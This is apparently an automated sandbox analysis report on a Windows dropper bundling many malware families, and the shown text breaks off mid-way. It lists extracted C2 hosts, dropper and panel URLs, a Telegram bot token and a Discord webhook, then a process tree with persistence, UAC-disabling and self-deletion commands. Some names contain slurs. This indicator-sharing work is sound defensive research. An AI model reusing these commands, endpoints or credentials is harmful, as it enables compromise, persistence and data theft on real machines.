asyncrat | 07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
11/04/2025, 22:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Shitstain.exe
Size

74.9MB
MD5

c7043b9b65e252b5305634da4f5515f1
SHA1

129a58d2c6c4de7fcead562f9729a28e517fb6d4
SHA256

07881667044b72b47a906d99ca3522e12c6cbad62b5e2e6db7930504f604366a
SHA512

cdc28eb03dcf533d19e74d7bd86962905486902c5556c448bbf0daa69be705dc1f18c7ea2c41ba8568a1910efb711edaa259a02d35108474e412b8044b719575
SSDEEP

1572864:Z6x3bF0F9U7b7ewHkli+ouzl1IBMrGZHdk/6eSDFb:UBF0Fsb7ewHkliN4km+91xb

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

sharpstealer

https://api.telegram.org/bot7057429288:AAHYl5_27YU1Yjmuj33WKOqLVSgYtq3n-8k/getUpdates

Extracted

Family

lokibot

https://rottot.shop/Devil/PWS/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

Default

dropout-37757.portmap.host:55554

dropout-37757.portmap.host:37757

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

silverrat

Version

1.0.0.0

clear-spice.gl.at.ply.gg:62042

Mutex

SilverMutex_ZtRAjMMKxS

Attributes

certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
decrypted_key
-|S.S.S|-
discord
https://discord.com/api/webhooks/1335733715820609557/QV6ZUiJPFo3MXmoiKBB-WTBlkHeBiFxmRY95RN_M1sHhPMswAoo2T6AL_kHvoSoCRKE0
key
yy6zDjAUmbB09pKvo5Hhug==
key_x509
dFRzdEVvbU9ZVUR2UmVzZFlPR3V3dlRGWURZdk9S
payload_url
https://g.top4top.io/p_2522c7w8u1.png
reconnect_delay
2
server_signature
PtC8aQAwsdmyktc6Q/l3u9a8oFTj+Ey3VIlIKXe9bX2WiEn7hNPQ0tkMLi1qQ4IBmCWOFTRIVHi2GG5zTxUlAwkitK3X3bWdHiwrf6PqZ7NdmPsSKZym4q+nKXH4df40wtjNvJ2x2m8OSi5jsVvT64/UsmRfIZbFTRp63PCTQ6lN+EL6OoW+dMidok+JH6T8pG21/HyoeykN9muipEqdoixkTFitX6aUocvGy6VZCs7eSxoXtzmYQ3tBukBHuIZAivbVLiF2aDkkpSX6763SGMYUbfASkQ/ihv1elb+XOoqprP3V4GqcllwfGzlk+8/rQD8C3cwLiQEtXgKHbyYWrNcSvis5fYgRcEDvlk2ZkbE8VQE6aNc+VN0TZNW3ldvE+h62kKCYoOb7oJDwiw86IudT01xe9YetmDuCvOIBZqGoXj0h68jOIklH4g22Fx8pOaIisv01vdSoawFzoOQNfgfZeRgjvV6QJHQiYuodn+FWlPwYxQ7FzUJy3is8d0VoJr6rG2BeEn99pW/LO+SsCfPIGZvs7oA/oEsn2BBkGVhlko0IZCxd30q3HIEIwdagGJgHVtnC5C2yMsmjV3geQMUCdRsAJEuCEVqAkTr7QQNJoSCok8jOYoOeJxzwbNzAMySliCDNoGYhhU/jnfhJKsqo355RYtvKROehEYZ0Srg=

Extracted

Family

quasar

Version

1.3.0.0

Botnet

nigga

niggahunter-28633.portmap.io:28633

Mutex

QSR_MUTEX_m0fef2zik6JZzavCsv

Attributes

encryption_key
E3KUWr7JQZqCWN4hstks
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

sality

http://89.119.67.154/testo5/

http://kukutrustnet777.info/home.gif

http://kukutrustnet888.info/home.gif

http://kukutrustnet987.info/home.gif

http://www.klkjwre9fqwieluoi.info/

http://kukutrustnet777888.info/

Extracted

Family

crimsonrat

185.136.161.124

Extracted

Family

metasploit

Version

metasploit_stager

54.169.93.143:10549

Extracted

Family

quasar

Version

1.4.1

Botnet

21325

146.190.110.91:13000

Mutex

e5627e25-0d0e-4509-8b39-a3de07ba1545

Attributes

encryption_key
3B7163AA2D236AA40236BB7204ED370202AD4ABE
install_name
explorer.exe
log_directory
Logs
reconnect_delay
3000
startup_key
MicrosoftQuasUpdate
subdirectory
explorer

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x00090000000242f7-574.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 4 IoCs

resource	yara_rule
behavioral1/files/0x00070000000242dd-267.dat	family_quasar
behavioral1/memory/3732-272-0x0000000000960000-0x00000000009BE000-memory.dmp	family_quasar
behavioral1/files/0x000b00000002434a-5986.dat	family_quasar
behavioral1/memory/9048-6608-0x0000000000220000-0x0000000000544000-memory.dmp	family_quasar

Sality
Sality is backdoor written in C++, first discovered in 2003.
backdoor sality
Sality family
sality
Sharp Stealer
Sharp Stealer is an infostealer first observed in 2024, based on Echelon and Umbral stealers.
stealer sharpstealer
Sharpstealer family
sharpstealer
SilverRat
SilverRat is trojan written in C#.
trojan silverrat
Silverrat family
silverrat

Sliver RAT v2 1 IoCs

resource	yara_rule
behavioral1/files/0x0011000000024121-8381.dat	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

ModiLoader First Stage 1 IoCs

resource	yara_rule
behavioral1/files/0x0007000000024359-809.dat	modiloader_stage1

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/files/0x000f0000000242e6-4117.dat	mimikatz

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
11700	powershell.exe
1300	powershell.exe
11896	powershell.exe
11848	powershell.exe
4408	powershell.exe

Downloads MZ/PE file

Uses browser remote debugging 2 TTPs 14 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
11124	chrome.exe
6532	msedge.exe
6932	msedge.exe
16732	msedge.exe
1360	msedge.exe
11148	chrome.exe
8592	chrome.exe
11168	chrome.exe
3248	msedge.exe
11384	msedge.exe
8740	msedge.exe
13216	chrome.exe
13736	chrome.exe
8836	chrome.exe

Uses the VBS compiler for execution 1 TTPs

Command and Scripting Interpreter
T1059

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/files/0x00070000000242f5-403.dat	vmprotect
behavioral1/memory/5516-773-0x0000000000EC0000-0x0000000000F62000-memory.dmp	vmprotect

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 21 IoCs

Web Service

T1102

flow	ioc
44	discord.com
45	discord.com
62	bitbucket.org
527	raw.githubusercontent.com
576	raw.githubusercontent.com
602	bitbucket.org
65	bitbucket.org
150	bitbucket.org
169	raw.githubusercontent.com
201	raw.githubusercontent.com
542	drive.google.com
601	bitbucket.org
346	raw.githubusercontent.com
540	drive.google.com
568	raw.githubusercontent.com
43	discord.com
67	bitbucket.org
88	bitbucket.org
167	raw.githubusercontent.com
196	bitbucket.org
791	raw.githubusercontent.com

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
54	whatismyipaddress.com
57	whatismyipaddress.com
105	api.ipify.org
107	api.ipify.org
485	ip-api.com
26	api.ipify.org
27	api.ipify.org
33	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 14 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
7184	powercfg.exe
4668	powercfg.exe
12452	cmd.exe
9208	powercfg.exe
6544	cmd.exe
14544	cmd.exe
15032	powercfg.exe
16828	powercfg.exe
3140	powercfg.exe
14756	powercfg.exe
14688	powercfg.exe
12556	powercfg.exe
13596	powercfg.exe
14968	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000024311-899.dat	autoit_exe
behavioral1/files/0x000d000000024352-6799.dat	autoit_exe

UPX packed file 12 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000242c0-43.dat	upx
behavioral1/memory/4876-57-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral1/files/0x00070000000242c4-144.dat	upx
behavioral1/memory/5608-152-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/4876-146-0x0000000000400000-0x0000000000418000-memory.dmp	upx
behavioral1/memory/1340-508-0x0000000002280000-0x000000000330E000-memory.dmp	upx
behavioral1/memory/1340-522-0x0000000002280000-0x000000000330E000-memory.dmp	upx
behavioral1/memory/1340-527-0x0000000002280000-0x000000000330E000-memory.dmp	upx
behavioral1/memory/6180-671-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/5608-1278-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/6180-1436-0x0000000000400000-0x000000000042E000-memory.dmp	upx
behavioral1/memory/1340-541-0x0000000002280000-0x000000000330E000-memory.dmp	upx

Detects Pyinstaller 2 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000024376-7110.dat	pyinstaller
behavioral1/files/0x0009000000024570-11660.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 18 IoCs

pid	pid_target	Process	procid_target
6428	4480	WerFault.exe
7040	6444	WerFault.exe	176
3144	2992	WerFault.exe	103
6928	2992	WerFault.exe	103
8188	6736	WerFault.exe	251
7280	7332	WerFault.exe	265
6956	2992	WerFault.exe	103
8344	7824	WerFault.exe	275
9088	7412	WerFault.exe	277
11916	9068	WerFault.exe	291
9364	13008	WerFault.exe	352
1548	5228	WerFault.exe
11520	13156	WerFault.exe	362
11364	12664	WerFault.exe	386
8544	14060	WerFault.exe	398
11904	10588	WerFault.exe	422
12380	10492	WerFault.exe	467
11488	9108	WerFault.exe	613

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Shitstain.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7180	PING.EXE
13508	PING.EXE
6532	cmd.exe
7632	PING.EXE
524	PING.EXE
14324	cmd.exe
9180	PING.EXE
14080	PING.EXE

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
14304	reg.exe
2192	reg.exe
10312	reg.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery

T1018

pid	Process
7632	PING.EXE
524	PING.EXE
9180	PING.EXE
14080	PING.EXE
7180	PING.EXE
13508	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
11744	schtasks.exe
10828	schtasks.exe
13668	schtasks.exe
14432	schtasks.exe
15744	schtasks.exe
7840	schtasks.exe
10940	schtasks.exe
13756	schtasks.exe
4024	schtasks.exe
7676	schtasks.exe
4872	schtasks.exe
6944	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\Shitstain.exe
"C:\Users\Admin\AppData\Local\Temp\Shitstain.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:3516
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZgBxACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAYgByACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARABpAGQAIAB5AG8AdQAgAGsAbgBvAHcAIAB5AG8AdQAnACcAcgBlACAAZgB1AGMAawBlAGQAIAB3AGkAdABoACAAYQAgAHMAaABpAHQAIAB0AG8AbgAgAG8AZgAgAFIAQQBUACAAZgBhAG0AaQBsAGkAZQBzAD8AIABPAGgAIAB3AGUAbABsACwAIABlAG4AagBvAHkAIAB0AGgAZQAgAG0AYQB5AGgAZQBtACEAJwAsACcAJwAsACcATwBLACcALAAnAEkAbgBmAG8AcgBtAGEAdABpAG8AbgAnACkAPAAjAHUAdQBxACMAPgA="
  2⤵
  PID:1680
- C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe
  "C:\Users\Admin\AppData\Local\Temp\_[MyFamilyPies]Avi.exe"
  2⤵
  PID:4672
- - C:\Users\Admin\AppData\Roaming\Installer.exe
    "C:\Users\Admin\AppData\Roaming\Installer.exe"
    3⤵
    PID:3704
- C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
  "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
  2⤵
  PID:5288
- - C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe
    "C:\Users\Admin\AppData\Local\Temp\0a77eae3916dbed61916324dbfeefd337b89acc1613b65d3291923caac3955cb_1.exe"
    3⤵
    PID:7136
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
      4⤵
      PID:7456
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
      4⤵
      PID:10520
- C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe
  "C:\Users\Admin\AppData\Local\Temp\0a-PORNOSKI.exe"
  2⤵
  PID:4712
- C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe
  "C:\Users\Admin\AppData\Local\Temp\0f8039360c1d7be25ff412cc1d4e2edbd1841bc0336d675b5877a128d5b0f19d.exe"
  2⤵
  PID:4876
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    PID:5556
- - C:\Users\Admin\AppData\Local\Temp\proxyt.exe
    "C:\Users\Admin\AppData\Local\Temp\proxyt.exe"
    3⤵
    PID:5608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\proxyt.exe > nul
      4⤵
      PID:1040
- C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe
  "C:\Users\Admin\AppData\Local\Temp\1aae7dcfcb679f01938f1bfff990a87ccaaa9b9bed05ff85d64cdc7e925b83ef.exe"
  2⤵
  PID:2620
- C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe
  "C:\Users\Admin\AppData\Local\Temp\5d2514a19b4099f082c344112df843b0bdf48c861c4dd81992758a8c10d38351.exe"
  2⤵
  PID:1096
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    3⤵
    PID:11396
- C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe
  "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
  2⤵
  PID:1884
- C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
  "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 152
    3⤵
    - Program crash
    PID:6956
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 140
    3⤵
    - Program crash
    PID:6928
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@2992
    3⤵
    PID:372
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
      4⤵
      PID:2288
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 524
    3⤵
    - Program crash
    PID:3144
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
  2⤵
  PID:408
- C:\Users\Admin\AppData\Local\Temp\2020.exe
  "C:\Users\Admin\AppData\Local\Temp\2020.exe"
  2⤵
  PID:3472
- - C:\Users\Admin\AppData\Local\Temp\2020.exe
    "C:\Users\Admin\AppData\Local\Temp\2020.exe"
    3⤵
    PID:2524
- C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
  "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
  2⤵
  PID:3832
- C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
  2⤵
  PID:5636
- C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
  2⤵
  PID:1664
- C:\Users\Admin\AppData\Local\Temp\goofy.exe
  "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
  2⤵
  PID:5752
- C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
  "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
  2⤵
  PID:2416
- C:\Users\Admin\AppData\Local\Temp\nigga.exe
  "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
  2⤵
  PID:3732
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4872
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:6716
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:7840
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EYYmrjWxAN1C.bat" "
      4⤵
      PID:5504
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:6192
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:524
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:13048
- C:\Users\Admin\AppData\Local\Temp\amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
  2⤵
  PID:3052
- - C:\ProgramData\a5410c88f1\bween.exe
    "C:\ProgramData\a5410c88f1\bween.exe"
    3⤵
    PID:6272
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
      4⤵
      PID:3380
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
        5⤵
        
        PID:7732
- C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
  "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
  2⤵
  PID:4400
- C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
  "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
  2⤵
  PID:5016
- C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
  2⤵
  PID:4900
- - C:\ProgramData\Hdlharas\dlrarhsiva.exe
    "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
    3⤵
    PID:6408
- C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
  2⤵
  PID:5776
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
  2⤵
  PID:5516
- C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
  "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
  2⤵
  PID:1340
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
    3⤵
    PID:3372
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
    3⤵
    PID:12576
- C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
  "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
  2⤵
  PID:3524
- - C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
    "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
    3⤵
    PID:8824
- C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
  2⤵
  PID:6312
- C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
  "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
  2⤵
  PID:7120
- C:\Users\Admin\AppData\Local\Temp\NetWire.exe
  "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
  2⤵
  PID:3320
- - C:\Users\Admin\AppData\Local\Temp\NetWire.exe
    "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
    3⤵
    PID:1852
- C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
  2⤵
  PID:6444
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 1716
    3⤵
    - Program crash
    PID:7040
- C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
  "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
  2⤵
  PID:3040
- C:\Users\Admin\AppData\Local\Temp\Remcos.exe
  "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
  2⤵
  PID:6664
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:6832
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:2192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    3⤵
    PID:6916
  - - C:\Windows\SysWOW64\PING.EXE
      PING 127.0.0.1 -n 2
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:7632
  - - C:\Windows\SysWOW64\Userdata\Userdata.exe
      "C:\Windows\SysWOW64\Userdata\Userdata.exe"
      4⤵
      PID:14968
    - - C:\Windows\SysWOW64\cmd.exe
        
